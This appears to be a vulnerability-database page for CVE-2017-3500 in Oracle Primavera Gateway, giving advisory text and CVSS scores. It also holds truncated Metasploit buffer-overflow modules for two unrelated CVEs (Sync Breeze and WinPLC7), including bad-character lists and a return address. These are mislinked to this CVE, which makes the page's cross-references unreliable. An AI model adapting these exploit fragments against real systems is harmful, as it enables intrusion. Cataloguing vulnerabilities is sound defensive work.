CVE-2017-3500
published 2017-04-24CVE-2017-3500: Vulnerability in the Primavera Gateway component of Oracle Primavera Products Suite (subcomponent: Primavera Desktop Integration). Supported versions that are…
PriorityP344high8.7CVSS 3.0
AVNACLPRHUINSCCHINAH
EPSS
2.00%
78.5th percentile
Vulnerability in the Primavera Gateway component of Oracle Primavera Products Suite (subcomponent: Primavera Desktop Integration). Supported versions that are affected are 1.0, 1.1, 14.2, 15.1, 15.2, 16.1 and 16.2. Easily "exploitable" vulnerability allows high privileged attacker with network access via HTTP to compromise Primavera Gateway. While the vulnerability is in Primavera Gateway, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Primavera Gateway accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Primavera Gateway. CVSS 3.0 Base Score 8.7 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:H).
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | primavera_gateway | — | — |
| oracle | primavera_gateway | — | — |
| oracle | primavera_gateway | — | — |
| oracle | primavera_gateway | — | — |
| oracle | primavera_gateway | — | — |
| oracle | primavera_gateway | — | — |
| oracle | primavera_gateway | — | — |
| oracle_corporation | primavera_gateway | — | — |
| oracle_corporation | primavera_gateway | — | — |
| oracle_corporation | primavera_gateway | — | — |
| oracle_corporation | primavera_gateway | — | — |
| oracle_corporation | primavera_gateway | — | — |
| oracle_corporation | primavera_gateway | — | — |
| oracle_corporation | primavera_gateway | — | — |
CVSS provenance
nvdv3.08.7HIGHCVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:H
nvdv2.04.9MEDIUMAV:N/AC:M/Au:S/C:P/I:N/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
exploitdb·2018-01-24
CVE-2017-7310 Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
'Description' => %q(
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
by using the import command option to import a specially crafted xml file.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'References' =>
[
[ 'CVE', '2017-7310' ],
[ 'EDB', '41773' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
'StackAdjustment' => -3500
Exploit-DB
Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)
exploitdb·2017-09-13
CVE-2017-5177 Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)
Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)
---
require 'msf/core'
class MetasploitModule 'VIPA Authomation WinPLC7 recv Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in VIPA
Automation WinPLC7 [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '17-112' ],
[ 'CVE', '2017-5177' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-054-01' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 EN',
{
# ws7v5.exe
# jmp esp
'Ret' => 0x00422354
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 28 2017'))
register_options(
[
Opt
No writeups or analysis indexed.
http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.htmlhttp://www.securityfocus.com/bid/97881http://www.securitytracker.com/id/1038289http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.htmlhttp://www.securityfocus.com/bid/97881http://www.securitytracker.com/id/1038289
2017-04-24
Published